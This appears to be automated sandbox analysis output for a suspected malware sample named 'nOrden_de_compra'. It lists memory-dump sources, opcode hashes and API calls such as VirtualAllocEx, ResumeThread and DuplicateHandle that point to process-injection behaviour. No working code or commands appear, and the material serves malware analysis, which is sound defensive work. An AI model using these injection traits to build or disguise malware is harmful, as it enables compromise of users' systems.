                                          control_flow_graph 429 50ed648-50ed6e4 DuplicateHandle 430 50ed6ed-50ed70a 429->430 431 50ed6e6-50ed6ec 429->431 431->430
                                          APIs
                                          • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?,?,?,?,050ED616,?,?,?,?,?), ref: 050ED6D7
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2115115847.00000000050E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 050E0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_50e0000_nOrden_de_compra.jbxd
                                          Similarity
                                          • API ID: DuplicateHandle
                                          • String ID:
                                          • API String ID: 3793708945-0
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 434 71e54f0-71e5573 VirtualAllocEx 438 71e557c-71e55a1 434->438 439 71e5575-71e557b 434->439 439->438
                                          APIs
                                          • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 071E5566
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2116654540.00000000071E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 071E0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_71e0000_nOrden_de_compra.jbxd
                                          Similarity
                                          • API ID: AllocVirtual
                                          • String ID:
                                          • API String ID: 4275171209-0
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • LoadLibraryExW.KERNELBASE(00000000,00000000,?,?,?,?,00000000,?,050EB039,00000800,00000000,00000000), ref: 050EB24A
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2115115847.00000000050E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 050E0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_50e0000_nOrden_de_compra.jbxd
                                          Similarity
                                          • API ID: LibraryLoad
                                          • String ID:
                                          • API String ID: 1029625771-0
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • LoadLibraryExW.KERNELBASE(00000000,00000000,?,?,?,?,00000000,?,050EB039,00000800,00000000,00000000), ref: 050EB24A
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2115115847.00000000050E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 050E0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_50e0000_nOrden_de_compra.jbxd
                                          Similarity
                                          • API ID: LibraryLoad
                                          • String ID:
                                          • API String ID: 1029625771-0
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 071E5566
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2116654540.00000000071E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 071E0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_71e0000_nOrden_de_compra.jbxd
                                          Similarity
                                          • API ID: AllocVirtual
                                          • String ID:
                                          • API String ID: 4275171209-0
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2116654540.00000000071E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 071E0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_71e0000_nOrden_de_compra.jbxd
                                          Similarity
                                          • API ID: ResumeThread
                                          • String ID:
                                          • API String ID: 947044025-0
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2116654540.00000000071E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 071E0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_71e0000_nOrden_de_compra.jbxd
                                          Similarity
                                          • API ID: ResumeThread
                                          • String ID:
                                          • API String ID: 947044025-0
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • PostMessageW.USER32(?,00000010,00000000,?), ref: 071E9E1D
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2116654540.00000000071E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 071E0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_71e0000_nOrden_de_compra.jbxd
                                          Similarity
                                          • API ID: MessagePost
                                          • String ID:
                                          • API String ID: 410705778-0
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • PostMessageW.USER32(?,00000010,00000000,?), ref: 071E9E1D
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2116654540.00000000071E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 071E0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_71e0000_nOrden_de_compra.jbxd
                                          Similarity
                                          • API ID: MessagePost
                                          • String ID:
                                          • API String ID: 410705778-0
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • GetModuleHandleW.KERNELBASE(00000000), ref: 050EAFBE
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2115115847.00000000050E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 050E0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_50e0000_nOrden_de_compra.jbxd
                                          Similarity
                                          • API ID: HandleModule
                                          • String ID:
                                          • API String ID: 4139908857-0
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2116681816.0000000007220000.00000040.00000800.00020000.00000000.sdmp, Offset: 07220000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_7220000_nOrden_de_compra.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2116681816.0000000007220000.00000040.00000800.00020000.00000000.sdmp, Offset: 07220000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_7220000_nOrden_de_compra.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2116681816.0000000007220000.00000040.00000800.00020000.00000000.sdmp, Offset: 07220000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_7220000_nOrden_de_compra.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2116681816.0000000007220000.00000040.00000800.00020000.00000000.sdmp, Offset: 07220000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_7220000_nOrden_de_compra.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2116681816.0000000007220000.00000040.00000800.00020000.00000000.sdmp, Offset: 07220000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_7220000_nOrden_de_compra.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2116681816.0000000007220000.00000040.00000800.00020000.00000000.sdmp, Offset: 07220000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_7220000_nOrden_de_compra.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 83fbc0835b8cddf1815c1493851989937a56559d812d7674030d6c11b52f270b
                                          • Instruction ID: fb215f9775ca284be891ae73f67955eaa0fbb8f95c9b389d5b2c12fe60e5f712
                                          • Opcode Fuzzy Hash: 83fbc0835b8cddf1815c1493851989937a56559d812d7674030d6c11b52f270b
                                          • Instruction Fuzzy Hash: 3241F3B4929628DFDB60CF14CC89799BBB1BB49305F0020D9EA09A3341DB709AC5DF04
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2116681816.0000000007220000.00000040.00000800.00020000.00000000.sdmp, Offset: 07220000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_7220000_nOrden_de_compra.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: d4e621884b69e898feaeba322019534868ab09e92821c920311f5367acf925a4
                                          • Instruction ID: c89420ec16a84c6cd0084c8143c922eb0214c8ab6192c6cdafbc13398cb7b5d2
                                          • Opcode Fuzzy Hash: d4e621884b69e898feaeba322019534868ab09e92821c920311f5367acf925a4
                                          • Instruction Fuzzy Hash: A231B374E10219DFDB08DFA9C8406EEBBF2BF88300F10802AE905B7354EB7599469F90
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2116681816.0000000007220000.00000040.00000800.00020000.00000000.sdmp, Offset: 07220000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_7220000_nOrden_de_compra.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: f0231385a4a93abff26e75a513695eafeee0eb8b74f0a7f4ed540065b030a69f
                                          • Instruction ID: 60c04b84d7f8ec502663fc39ce692d120630c863eb904f6aec61fcb8f5210911
                                          • Opcode Fuzzy Hash: f0231385a4a93abff26e75a513695eafeee0eb8b74f0a7f4ed540065b030a69f
                                          • Instruction Fuzzy Hash: 4B314974E20219DFDB04DFA9C448AEEBBB2FB89310F018129D811A7354CB709D42DF90
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2112668751.000000000125D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0125D000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_125d000_nOrden_de_compra.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 3706c339a7d7d233c143c37bfd72f72c9b0e59ef51562a70183aabf749447a57
                                          • Instruction ID: 96b5ca582ffe0a62b3a7bcd2642ba00d011431099a2041036243cec275443330
                                          • Opcode Fuzzy Hash: 3706c339a7d7d233c143c37bfd72f72c9b0e59ef51562a70183aabf749447a57
                                          • Instruction Fuzzy Hash: 06214876110208EFDB05DF44D9C0B66BF65FB84324F20C16CDE090B256C376E456CAA1
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2116681816.0000000007220000.00000040.00000800.00020000.00000000.sdmp, Offset: 07220000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_7220000_nOrden_de_compra.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: e7c4da80ee76fd3a2663725615351471e33973e4a7a7fad95bd79a8f238f2bad
                                          • Instruction ID: 2727ea1f9ee0de63b63251ba45f17c314f721ceabf7b5094ea0c764d74569843
                                          • Opcode Fuzzy Hash: e7c4da80ee76fd3a2663725615351471e33973e4a7a7fad95bd79a8f238f2bad
                                          • Instruction Fuzzy Hash: BE3102B8E1020ACFDB44DFA9D4847AEBBF1FB89304F10946AD904A3294EB745A45CF50
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2116681816.0000000007220000.00000040.00000800.00020000.00000000.sdmp, Offset: 07220000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_7220000_nOrden_de_compra.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: f2533d4bd3d6462488e737963640af615ffedb33c034211685953c3de1a591e0
                                          • Instruction ID: 4a2e60eda56c40bab490f6f188fdc2105ace013424b5a7b9f6f1501a86502af4
                                          • Opcode Fuzzy Hash: f2533d4bd3d6462488e737963640af615ffedb33c034211685953c3de1a591e0
                                          • Instruction Fuzzy Hash: 0131F2B8E1020ADFDB44DFA9D4846EEBBF1FB89304F109469D904B3294EB746A45CF60
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2116681816.0000000007220000.00000040.00000800.00020000.00000000.sdmp, Offset: 07220000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_7220000_nOrden_de_compra.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: e1ff9c7ea4e82252b5b6cea703cdc0a3272ba74bb413bfe841291c1cbdc4d2ad
                                          • Instruction ID: 2f9770a9520c3ba9dbaa5707194c096b4bf569519fb03f88d4d51e47990ae142
                                          • Opcode Fuzzy Hash: e1ff9c7ea4e82252b5b6cea703cdc0a3272ba74bb413bfe841291c1cbdc4d2ad
                                          • Instruction Fuzzy Hash: 2B3116B8E2021EDFCB84DFA9C4956BEBBB1FB88300F108129D915A7344DB745942DF51
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2112740017.000000000126D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0126D000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_126d000_nOrden_de_compra.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 7c588f239d084b164f65be13275041bb1076df614225ccec551babefe045853a
                                          • Instruction ID: 1eb7fc4205687d420ff355cb4fa8b51bb4343340f4db41b4acbc102bf171d806
                                          • Opcode Fuzzy Hash: 7c588f239d084b164f65be13275041bb1076df614225ccec551babefe045853a
                                          • Instruction Fuzzy Hash: B221677561424CEFDB04CF54C9C0B25BBA9FB84324F20C56DD9890B292C37AD896CE61
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2112740017.000000000126D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0126D000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_126d000_nOrden_de_compra.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 5bb2bbde34aaf59074b9807fcf1083917d957514166d8000fa9a85b2cea226cf
                                          • Instruction ID: 326ff1322d74c11d0b3c461e73077b8103241711b903bc2768dfe6116554d6dd
                                          • Opcode Fuzzy Hash: 5bb2bbde34aaf59074b9807fcf1083917d957514166d8000fa9a85b2cea226cf
                                          • Instruction Fuzzy Hash: 732164B521430CEFDB04DF54C9C0B26BB69FB84314F20C5ACDA490B292C3BAD886CA61
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2116681816.0000000007220000.00000040.00000800.00020000.00000000.sdmp, Offset: 07220000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_7220000_nOrden_de_compra.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: aa2439095c0293bf03730a04a5af51bd3b890daf30935aab58955d778e8c2147
                                          • Instruction ID: bf8b0cb0a8dbf075c8c7581f9734e146fcb4efc75eaadcd3612224f250da2995
                                          • Opcode Fuzzy Hash: aa2439095c0293bf03730a04a5af51bd3b890daf30935aab58955d778e8c2147
                                          • Instruction Fuzzy Hash: 652151B4D2421AEFDB04DFAAC0446BEBBB2FF88300F10C1A9D815A7244D7759992DF84
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2116681816.0000000007220000.00000040.00000800.00020000.00000000.sdmp, Offset: 07220000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_7220000_nOrden_de_compra.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 61db5d180d57abaeadad70ddc82321c3d550192890d69b14581ecd43d4b7e159
                                          • Instruction ID: 554662af3e67f1000cd746782720659416d03fdd6697428afea55612852ff6c4
                                          • Opcode Fuzzy Hash: 61db5d180d57abaeadad70ddc82321c3d550192890d69b14581ecd43d4b7e159
                                          • Instruction Fuzzy Hash: E0219074A11908EFC704DF5AE68499DBBF1FF8C210B6280D5E8449B225DB31EE11DF10
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2116681816.0000000007220000.00000040.00000800.00020000.00000000.sdmp, Offset: 07220000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_7220000_nOrden_de_compra.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: c16ddd47c92ef6b5299aa340845b88e20b8d83d3079ccca62e5a38256526b96e
                                          • Instruction ID: 511b48180b653f9f79932bbfcecb4679f9fe584f5da5a2b1d208c19b79fb9f52
                                          • Opcode Fuzzy Hash: c16ddd47c92ef6b5299aa340845b88e20b8d83d3079ccca62e5a38256526b96e
                                          • Instruction Fuzzy Hash: D221E7B8D10209EFDB45DFA8D881AAEBFB1FF48310F1091A9E904A7250D7709B51DF81
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2112668751.000000000125D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0125D000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_125d000_nOrden_de_compra.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: fed46cca7f742b7caa711e8ed735342f41d2c2d3303e466d284e334843d61363
                                          • Instruction ID: 689f560ea18a8210bba57991ee21e9ad06c9d720c925170ee6c24076c35324b9
                                          • Opcode Fuzzy Hash: fed46cca7f742b7caa711e8ed735342f41d2c2d3303e466d284e334843d61363
                                          • Instruction Fuzzy Hash: 7611CDB6404284CFDB06CF44D5C0B56BF72FB84224F24C2A9DD090A256C33AE456CBA1
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2112740017.000000000126D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0126D000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_126d000_nOrden_de_compra.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 703b7abd3718bd21aa6f36dac6c8dc0e73c65716f16ca45b46755fc1987422b6
                                          • Instruction ID: d473d41575707add8207aa194db320143ad5452601f1809eea2a3c61ba540f9e
                                          • Opcode Fuzzy Hash: 703b7abd3718bd21aa6f36dac6c8dc0e73c65716f16ca45b46755fc1987422b6
                                          • Instruction Fuzzy Hash: 7111BB79604288CFCB02CF54D6C0B19BFA1FB84214F24C6A9D9894B292C33AD45ACF61
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2116681816.0000000007220000.00000040.00000800.00020000.00000000.sdmp, Offset: 07220000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_7220000_nOrden_de_compra.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 5a8e9f888c00b13690136e7b6f2be0a9c603adc96c82118cfbafdf4c250eeb18
                                          • Instruction ID: d8d5e6197a165ca2356c2dab1a40448d50aec0e0847a5fb75dcdfa8c649a7b6f
                                          • Opcode Fuzzy Hash: 5a8e9f888c00b13690136e7b6f2be0a9c603adc96c82118cfbafdf4c250eeb18
                                          • Instruction Fuzzy Hash: 52018BB4D14209ABCB40EFAAD4457ADBBB5FB88300F1081A59C08D3344EB709A42DB40
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2116681816.0000000007220000.00000040.00000800.00020000.00000000.sdmp, Offset: 07220000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_7220000_nOrden_de_compra.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: e9408e2528f588aea47d405b314cc9f86bb0e94a9285b67970c3e0515477323a
                                          • Instruction ID: f062c09f7dd02afb7d13099124059c4e01fc3931642da05badef857cac04ae62
                                          • Opcode Fuzzy Hash: e9408e2528f588aea47d405b314cc9f86bb0e94a9285b67970c3e0515477323a
                                          • Instruction Fuzzy Hash: F411B078921508EFCB40DF99E58999CBFB0FB48210F5281D5EC84A7325CB30AAA1CF51
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2116681816.0000000007220000.00000040.00000800.00020000.00000000.sdmp, Offset: 07220000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_7220000_nOrden_de_compra.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: cc564225aef26624a235c4ff267343031d08d0c749d533179ce1c4843b0eeea0
                                          • Instruction ID: 486a195b3b64ac6af976dd209b16f12fa9292ccb85e4588736bd17ba0df03277
                                          • Opcode Fuzzy Hash: cc564225aef26624a235c4ff267343031d08d0c749d533179ce1c4843b0eeea0
                                          • Instruction Fuzzy Hash: 520117B4D2560ADFDB44DFAAC4453AEBBF5AB89300F1481A9D808E3200E7749A95DF80
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2116681816.0000000007220000.00000040.00000800.00020000.00000000.sdmp, Offset: 07220000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_7220000_nOrden_de_compra.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 8c64d513e095e5595efb364cc25b386964cc8f06812297027a68ae2d6f385053
                                          • Instruction ID: 07c269930e089cfd7042d0392840cd0d5ca7d0b1c81997eb0955b2a456c83aec
                                          • Opcode Fuzzy Hash: 8c64d513e095e5595efb364cc25b386964cc8f06812297027a68ae2d6f385053
                                          • Instruction Fuzzy Hash: 570148B8D14209AFCB44EFAAD4456AEBBB5FB88300F1095A59C18D3304DBB05A45DF40
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2116681816.0000000007220000.00000040.00000800.00020000.00000000.sdmp, Offset: 07220000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_7220000_nOrden_de_compra.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 8aae6ac42b8b3c786393cc58c423d37da958169a90b078218887a54e387996e7
                                          • Instruction ID: 452fee14679fd0cf6d18438e2db837b5cf8e72b508b54369354028b945463517
                                          • Opcode Fuzzy Hash: 8aae6ac42b8b3c786393cc58c423d37da958169a90b078218887a54e387996e7
                                          • Instruction Fuzzy Hash: 51F0A0B10293889FC701CB70981A3583FF8DB0B101F2446A2DD04C7162EA789A09DB52
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2116681816.0000000007220000.00000040.00000800.00020000.00000000.sdmp, Offset: 07220000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_7220000_nOrden_de_compra.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 7c0ff830193fe2c25f7b3dc53ed9220744a925ad86cc75ad85a578957528c139
                                          • Instruction ID: d6a21134b4c404ba042a47579c72e55a6f5ede0854b8b01f591036005a02cea6
                                          • Opcode Fuzzy Hash: 7c0ff830193fe2c25f7b3dc53ed9220744a925ad86cc75ad85a578957528c139
                                          • Instruction Fuzzy Hash: 44F0FFB8D14219DFDB44DFA9D4456ADBBB4FB49700F1086669C14E3300DB705A45DF50
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2116681816.0000000007220000.00000040.00000800.00020000.00000000.sdmp, Offset: 07220000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_7220000_nOrden_de_compra.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 024766ada98ba69fe2b00c4b5e4125c54762153cb027a3058a8cf67316a4f271
                                          • Instruction ID: 2f37f91518a0e66d9df6b2830a301ad814b47e28eef3be1fbec9c628426721c7
                                          • Opcode Fuzzy Hash: 024766ada98ba69fe2b00c4b5e4125c54762153cb027a3058a8cf67316a4f271
                                          • Instruction Fuzzy Hash: E0F08CB4D18208AFC740DBA8D84539CBBF4EB48300F10C1A9A808D3341D731DA52DF40
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2116681816.0000000007220000.00000040.00000800.00020000.00000000.sdmp, Offset: 07220000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_7220000_nOrden_de_compra.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 50d01222aec53f11b9e7433633c8cc8a29b97a408df6e7921c9aad9c31928083
                                          • Instruction ID: 0c8418578440f964684d5ff7bb108576725cac60159be572fa7cdd74c910bc26
                                          • Opcode Fuzzy Hash: 50d01222aec53f11b9e7433633c8cc8a29b97a408df6e7921c9aad9c31928083
                                          • Instruction Fuzzy Hash: 2FE022B5538294EBDB09EF60D4067AD7F36AB43210F00828CDC0503293CF399A47D7A0
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2116681816.0000000007220000.00000040.00000800.00020000.00000000.sdmp, Offset: 07220000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_7220000_nOrden_de_compra.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: fa211bda9a3a8b13a318db60fbb88e5986c9fb376f146d3b063bab55be341326
                                          • Instruction ID: 3cfe8f8b66f4f8f9bb20bdcae42375ae9ccf8750c75ab802d4184e32fe23e363
                                          • Opcode Fuzzy Hash: fa211bda9a3a8b13a318db60fbb88e5986c9fb376f146d3b063bab55be341326
                                          • Instruction Fuzzy Hash: EBE0D874828218EBCB04EF50D4065EDBB39BB46300F004158DC0413211CF749F45EB95
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2116681816.0000000007220000.00000040.00000800.00020000.00000000.sdmp, Offset: 07220000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_7220000_nOrden_de_compra.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 1407580df3790714ee4f8eae4d77517b46260363fba5d20e17d9635ceeb8b70e
                                          • Instruction ID: f9e2e2220103a24bfb95d7c3782419526487cfed082c2ff4c84a6c381210ffb4
                                          • Opcode Fuzzy Hash: 1407580df3790714ee4f8eae4d77517b46260363fba5d20e17d9635ceeb8b70e
                                          • Instruction Fuzzy Hash: 19E0DF78228285ABE345CAA0D504B6A7FA59B4620CF1482CCCC4847282CA76DD83CB80
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2116681816.0000000007220000.00000040.00000800.00020000.00000000.sdmp, Offset: 07220000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_7220000_nOrden_de_compra.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 0c308c4c9ba0b81be20e17329df1dc0782e3618b8f3419c65432fc7a130162a4
                                          • Instruction ID: 518ebb2d849249247e0b7449f2ef26755d61852acb54021fda41f0f09dfb6f2c
                                          • Opcode Fuzzy Hash: 0c308c4c9ba0b81be20e17329df1dc0782e3618b8f3419c65432fc7a130162a4
                                          • Instruction Fuzzy Hash: DFE0E5B4E14208EFCB94DFA9D4456ACBBF5EB88200F10C1E9A80893340D771AA52DF40
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2116681816.0000000007220000.00000040.00000800.00020000.00000000.sdmp, Offset: 07220000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_7220000_nOrden_de_compra.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: fb6e2ff25454cc545eed3d3f60d81a3281d9321a854d9880eb07af1444e23657
                                          • Instruction ID: afcc2353be905a8df0412ea3535a36ec8121e87497a0af7a8de9783c58195377
                                          • Opcode Fuzzy Hash: fb6e2ff25454cc545eed3d3f60d81a3281d9321a854d9880eb07af1444e23657
